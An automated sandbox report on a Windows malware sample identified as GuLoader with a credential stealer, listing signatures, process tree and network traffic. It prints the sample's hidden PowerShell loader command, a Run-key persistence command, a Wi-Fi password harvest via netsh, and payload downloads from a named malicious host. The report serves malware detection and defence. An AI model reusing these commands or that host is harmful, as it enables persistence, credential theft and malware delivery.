
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1430487
MD5:afaedf2ff4dc43d62b33b003a1a501ab
SHA1:9efe783f2dace329faa38ecefe77b6359dab3bd8
SHA256:1eccc2406bb9358ea0d3290d9b06433732fab544690fbeb65c93a3175ba30422

Detection

GuLoader, PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Capture Wi-Fi password
Yara detected GuLoader
Yara detected PXRECVOWEIWOEI Stealer
Check if machine is in data center or colocation facility
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: ImagingDevices Unusual Parent/Child Processes
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • file.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AFAEDF2FF4DC43D62B33B003A1A501AB)
    • powershell.exe (PID: 6956 cmdline: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7152 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • ImagingDevices.exe (PID: 5504 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)
        • cmd.exe (PID: 4992 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5824 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • cmd.exe (PID: 6176 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 5888 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • netsh.exe (PID: 636 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • findstr.exe (PID: 3388 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • svchost.exe (PID: 1696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • file.exe (PID: 6288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AFAEDF2FF4DC43D62B33B003A1A501AB)
    • powershell.exe (PID: 6408 cmdline: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7032 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • ImagingDevices.exe (PID: 5408 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 3F6F254D24C457BF33227502ED4F0988)
  • msiexec.exe (PID: 2212 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Source | Rule | Description | Author | Strings
00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PXRECVOWEIWOEI | Yara detected PXRECVOWEIWOEI Stealer | Joe Security |
00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PXRECVOWEIWOEI | Yara detected PXRECVOWEIWOEI Stealer | Joe Security |
0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

            System Summary

            Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 4992, ProcessName: cmd.exe
            Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5824, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Udbygningerne230
            Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4992, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 5824, ProcessName: reg.exe
            Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7152, ProcessName: cmd.exe
            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)", ProcessId: 4992, ProcessName: cmd.exe
            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", CommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6928, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)", ProcessId: 6956, ProcessName: powershell.exe
            Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1696, ProcessName: svchost.exe

            Stealing of Sensitive Information

            Source: Process started; Author: Joe Security; Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 5504, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6176, ProcessName: cmd.exe
            No Snort rule has matched

            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: whatismyipaddressnow.co
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: icanhazip.com
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49705 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49709 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jAscfKcoNcxeCpbJ57.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: crowninter.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: crowninter.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 104.21.71.78:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@54/21@5/39
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Pitapats
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMutant created: \Sessions\1\BaseNamedObjects\651689
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsvF7C9.tmp
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
